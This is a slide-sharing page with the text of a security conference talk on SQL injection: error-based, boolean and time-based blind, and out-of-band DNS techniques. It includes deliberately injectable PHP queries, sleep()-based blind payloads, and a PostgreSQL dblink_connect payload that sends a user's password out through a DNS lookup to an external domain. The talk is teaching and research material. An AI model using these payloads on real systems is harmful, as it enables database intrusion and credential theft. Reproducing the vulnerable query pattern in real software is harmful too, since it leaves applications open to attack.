Ömer Çıtak, profile picture
Uploaded byÖmer Çıtak
PDF, PPTX314 views

Out-of-band SQL Injection Attacks (#istsec)

The document discusses SQL injection techniques including: - In-band SQL injection using error-based techniques - Indirect inference SQL injection using boolean-based and blind time-based techniques - Out-of-band SQL injection using blind HTTP and DNS techniques It provides code examples of each technique and describes a demo setup with dependencies on a DNS server and app/database server to demonstrate an out-of-band SQL injection exploiting a DNS lookup.

Embed presentation

Download as PDF, PPTX
whoami Security Researcher @ Netsparker Ltd. Developer @ Another Times Writer @ Ethical Hacking “Offensive & Defensive” Book Blog: omercitak.com All Social Platform: @Om3rCitak
sql injection ● Inband ○ Error Based ● Indirect Inference ○ Boolean Based ○ Blind (Time Based) ● Out-of-band ○ Blind (HTTP, DNS)
sql injection ● Inband ○ Error Based .... ini_set('display_errors', 'On'); error_reporting(E_ALL); $sql = "SELECT * FROM users WHERE username like '%".$_GET["username"]."%'"; $results = mysql_query($sql); ...
sql injection ● Inband ○ Error Based
sql injection ● Indirect Inference ○ Boolean Based .... ini_set('display_errors', 'Off'); error_reporting(~E_ALL); $sql = "SELECT * FROM users WHERE username like '%".$_GET["username"]."%'"; $results = mysql_query($sql); $row_count = mysql_num_rows($results); if($row_count > 0) echo 'user exist'; else echo 'user not exist'; ...
sql injection ● Indirect Inference ○ Boolean Based
sql injection ● Indirect Inference ○ Blind (Time Based) .... ini_set('display_errors', 'Off'); error_reporting(~E_ALL); $sql = "SELECT * FROM users WHERE username like '%".$_GET["username"]."%'"; $results = mysql_query($sql); ...
sql injection ● Indirect Inference ○ Blind (Time Based)
sql injection ● Indirect Inference ○ Blind (Time Based) payload> ay' and if(substring(user(),1,1) = 'r', sleep(3), false) --
sql injection ● Indirect Inference ○ Blind (Time Based) payload> ay' and if(substring(user(),1,1) = 'a', sleep(3), false) --
sql injection ● Out-of-band ○ Blind (HTTP, DNS) .... ini_set('display_errors', 'Off'); error_reporting(~E_ALL); $sql = "SELECT * FROM users WHERE (username like '%".$_GET["param"]."%')"; $results = pg_query($sql); ...
demo ● dependencies; ○ 1 DNS server => 207.154.221.107 ■ Ubuntu 16 ■ Spiderlab Responder ○ 1 app & database server => 46.101.229.160 ■ Ubuntu 16 ■ Php7 ■ Postgresql 9.5 and 1 unit attacker
demo SELECT * FROM users WHERE (username like '%".$_GET["param"]."%')
demo SELECT * FROM users WHERE (username like '% '||'test'||'%')
demo SELECT * FROM users WHERE (username like '% '|| cast(test as numeric) ||'%')
demo SELECT * FROM users WHERE (username like '% '|| cast(SELECT(test) as numeric) ||'%')
demo SELECT * FROM users WHERE (username like '% '|| cast(SELECT(dblink_connect()) as numeric) ||'%')
demo SELECT * FROM users WHERE (username like '% '|| cast(SELECT(dblink_connect('host=test.omercitak.net user=a password=a connect_timeout=2')) as numeric) ||'%')
demo SELECT * FROM users WHERE (username like '% '|| cast(SELECT(dblink_connect('host='||(select password from users where id=7)||'.omercitak.net user=a password=a connect_timeout=2')) as numeric) ||'%')
demo
where is the guvenlik?
thanks www.omercitak.com All Social Platform: @Om3rCitak

More Related Content

PDF
Out-of-band Sql Injection Attacks (#hacktrickconf)
byÖmer Çıtak
 
PDF
#İstSec'17 Out of Band Sql Injection Attacks
byBGA Cyber Security
 
PDF
Out-of-band SQL Injection Attacks (#cypsec'17)
byÖmer Çıtak
 
PPTX
SQL Injections - 2016 - Huntington Beach
byJeff Prom
 
PDF
Identity theft blue4it nljug
byBrian Vermeer
 
PDF
Building decentralised apps with js - Devoxx Morocco 2018
byMikhail Kuznetcov
 
PPTX
SQL Injections and Behind...
byarjunguptam
 
PDF
Vulnerable Active Record: A tale of SQL Injection in PHP Framework
byPichaya Morimoto
 
Out-of-band Sql Injection Attacks (#hacktrickconf)
byÖmer Çıtak
 
#İstSec'17 Out of Band Sql Injection Attacks
byBGA Cyber Security
 
Out-of-band SQL Injection Attacks (#cypsec'17)
byÖmer Çıtak
 
SQL Injections - 2016 - Huntington Beach
byJeff Prom
 
Identity theft blue4it nljug
byBrian Vermeer
 
Building decentralised apps with js - Devoxx Morocco 2018
byMikhail Kuznetcov
 
SQL Injections and Behind...
byarjunguptam
 
Vulnerable Active Record: A tale of SQL Injection in PHP Framework
byPichaya Morimoto
 

Similar to Out-of-band SQL Injection Attacks (#istsec)

PDF
Hacking Your Way To Better Security - php[tek] 2016
byColin O'Dell
 
PDF
Hacking Your Way To Better Security
byColin O'Dell
 
PPTX
Hacking Your Way to Better Security - PHP South Africa 2016
byColin O'Dell
 
PDF
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
byPichaya Morimoto
 
PPTX
CHAPTER six DataBase Driven Websites.pptx
byKelemAlebachew
 
PDF
SQL Injection Attack Guide for ethical hacking
byAyan Live Rourkela
 
PDF
PHP with MySQL
bywahidullah mudaser
 
PDF
Sql-Injection
byМихаил Фирстов
 
PDF
Defcon 17-joseph mccray-adv-sql_injection
byAhmed AbdelSatar
 
KEY
SQL Injection - Mozilla Security Learning Center
byMichael Coates
 
PPT
Part 2
byA VD
 
PDF
Php Security - OWASP
byMizno Kruge
 
PPTX
Hacking Your Way To Better Security - Dutch PHP Conference 2016
byColin O'Dell
 
PPTX
Web Security - Hands-on
byAndrea Valenza
 
PPTX
Hacking Your Way To Better Security - DrupalCon Baltimore 2017
byColin O'Dell
 
PPTX
Hacking Your Way to Better Security - ZendCon 2016
byColin O'Dell
 
PDF
2014 database - course 3 - PHP and MySQL
byHung-yu Lin
 
ODP
My app is secure... I think
byWim Godden
 
PDF
My app is secure... I think
byWim Godden
 
ODP
My app is secure... I think
byWim Godden
 
Hacking Your Way To Better Security - php[tek] 2016
byColin O'Dell
 
Hacking Your Way To Better Security
byColin O'Dell
 
Hacking Your Way to Better Security - PHP South Africa 2016
byColin O'Dell
 
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
byPichaya Morimoto
 
CHAPTER six DataBase Driven Websites.pptx
byKelemAlebachew
 
SQL Injection Attack Guide for ethical hacking
byAyan Live Rourkela
 
PHP with MySQL
bywahidullah mudaser
 
Sql-Injection
byМихаил Фирстов
 
Defcon 17-joseph mccray-adv-sql_injection
byAhmed AbdelSatar
 
SQL Injection - Mozilla Security Learning Center
byMichael Coates
 
Part 2
byA VD
 
Php Security - OWASP
byMizno Kruge
 
Hacking Your Way To Better Security - Dutch PHP Conference 2016
byColin O'Dell
 
Web Security - Hands-on
byAndrea Valenza
 
Hacking Your Way To Better Security - DrupalCon Baltimore 2017
byColin O'Dell
 
Hacking Your Way to Better Security - ZendCon 2016
byColin O'Dell
 
2014 database - course 3 - PHP and MySQL
byHung-yu Lin
 
My app is secure... I think
byWim Godden
 
My app is secure... I think
byWim Godden
 
My app is secure... I think
byWim Godden
 

More from Ömer Çıtak

PDF
Memcache Injection (Hacktrick'15)
byÖmer Çıtak
 
PPTX
Web Uygulama Güvenliği (Akademik Bilişim 2016)
byÖmer Çıtak
 
PDF
Laravel ile hızlı ve modern web programlama
byÖmer Çıtak
 
PDF
Cyber Security's Good Sectors & Bad Sectors
byÖmer Çıtak
 
PPTX
Bir Şeyi Hacklemek (DEU ACM Bilişim Günleri 2016)
byÖmer Çıtak
 
PDF
Web Uygulamalarının Hacklenmesi
byÖmer Çıtak
 
PDF
osquery injection
byÖmer Çıtak
 
PDF
Web Çatı Şablonlarının Güvenliği (SSTI) - Özgür Web Günleri 2016
byÖmer Çıtak
 
PDF
How to Make Web RTS Game?
byÖmer Çıtak
 
PDF
Data manipulation Will hackers rule the world?
byÖmer Çıtak
 
PDF
Günahı ile Sevabı ile Laravel
byÖmer Çıtak
 
Memcache Injection (Hacktrick'15)
byÖmer Çıtak
 
Web Uygulama Güvenliği (Akademik Bilişim 2016)
byÖmer Çıtak
 
Laravel ile hızlı ve modern web programlama
byÖmer Çıtak
 
Cyber Security's Good Sectors & Bad Sectors
byÖmer Çıtak
 
Bir Şeyi Hacklemek (DEU ACM Bilişim Günleri 2016)
byÖmer Çıtak
 
Web Uygulamalarının Hacklenmesi
byÖmer Çıtak
 
osquery injection
byÖmer Çıtak
 
Web Çatı Şablonlarının Güvenliği (SSTI) - Özgür Web Günleri 2016
byÖmer Çıtak
 
How to Make Web RTS Game?
byÖmer Çıtak
 
Data manipulation Will hackers rule the world?
byÖmer Çıtak
 
Günahı ile Sevabı ile Laravel
byÖmer Çıtak
 

Recently uploaded

PDF
Best Bank Statement Converter Software - A Documentation-Based Meta-Analysis ...
bylewisconrada
 
PDF
65 AI-related Posts Catalog https://tinyurl.com/mpavkr8z
byBob Marcus
 
PDF
Using Change Data Capture (CDC) to Ingest Data into Apache Kafka
byGiovanni Marigi
 
PDF
Saga: The new era of transactions in a microservices architecture
byGiovanni Marigi
 
PDF
The Cost of Missing Critical Connections in Data - Suspicious Behavior Detect...
byEnterprise Knowledge
 
PPTX
On-Device AI with Gemma 3n and PaliGemma 2 Session Slides - GDG VESIT
bygdgcodecellcmpn
 
PPTX
Software Tools for penetration Testing (1).pptx
byAmosCheruiyot13
 
PDF
oracle_apex_tamil_export_an_application.pdf
byUthamaselvan M
 
DOCX
Quercus semecarpifolia is widely recognized as a keystone species in alpine a...
byMadan Bhandari university and St. Xavier's college , Maitighar
 
PDF
Azure Identity, Governance, and Monitoring solutions
byVICTOR MAESTRE RAMIREZ
 
PPTX
Information about Trusted Platform Module(TPM)
bynewtoknow techs
 
PPTX
DATALIVA-Presentation-EN_2026 Budgeting SAP Odoo ERP
byMustafa Kuğu
 
PPTX
IBM_NEXA_DAC2021 NEXA, a cloud-native platform for collaborative hardware log...
byArun Joseph
 
PDF
Taxonomy Principles to Support Knowledge Management at a Not-for-Profit
byEnterprise Knowledge
 
PDF
DataLiva-LivaGRC- Business Software for Governance, Risk, and Compliance
byMustafa Kuğu
 
PDF
Best-Travel-Portal-Development-Solutions-for-Online-Growth
bykashishnagarrajput
 
PDF
How to Connect HP LaserJet MFP M234dwe to WiFi
byPrinter Tales
 
PDF
Digital Transformation Services The Key to Futureproofing Your Business
byQuadrafort Technolgies
 
PDF
Beyond BBB: Practical Alternatives to Posterior Approximation in Bayesian Neu...
byTomasz Kusmierczyk
 
PDF
From Compliance to Competitive Advantage Board-Level Cyber Governance Under D...
bySaraDavis91
 
Best Bank Statement Converter Software - A Documentation-Based Meta-Analysis ...
bylewisconrada
 
65 AI-related Posts Catalog https://tinyurl.com/mpavkr8z
byBob Marcus
 
Using Change Data Capture (CDC) to Ingest Data into Apache Kafka
byGiovanni Marigi
 
Saga: The new era of transactions in a microservices architecture
byGiovanni Marigi
 
The Cost of Missing Critical Connections in Data - Suspicious Behavior Detect...
byEnterprise Knowledge
 
On-Device AI with Gemma 3n and PaliGemma 2 Session Slides - GDG VESIT
bygdgcodecellcmpn
 
Software Tools for penetration Testing (1).pptx
byAmosCheruiyot13
 
oracle_apex_tamil_export_an_application.pdf
byUthamaselvan M
 
Quercus semecarpifolia is widely recognized as a keystone species in alpine a...
byMadan Bhandari university and St. Xavier's college , Maitighar
 
Azure Identity, Governance, and Monitoring solutions
byVICTOR MAESTRE RAMIREZ
 
Information about Trusted Platform Module(TPM)
bynewtoknow techs
 
DATALIVA-Presentation-EN_2026 Budgeting SAP Odoo ERP
byMustafa Kuğu
 
IBM_NEXA_DAC2021 NEXA, a cloud-native platform for collaborative hardware log...
byArun Joseph
 
Taxonomy Principles to Support Knowledge Management at a Not-for-Profit
byEnterprise Knowledge
 
DataLiva-LivaGRC- Business Software for Governance, Risk, and Compliance
byMustafa Kuğu
 
Best-Travel-Portal-Development-Solutions-for-Online-Growth
bykashishnagarrajput
 
How to Connect HP LaserJet MFP M234dwe to WiFi
byPrinter Tales
 
Digital Transformation Services The Key to Futureproofing Your Business
byQuadrafort Technolgies
 
Beyond BBB: Practical Alternatives to Posterior Approximation in Bayesian Neu...
byTomasz Kusmierczyk
 
From Compliance to Competitive Advantage Board-Level Cyber Governance Under D...
bySaraDavis91
 

Out-of-band SQL Injection Attacks (#istsec)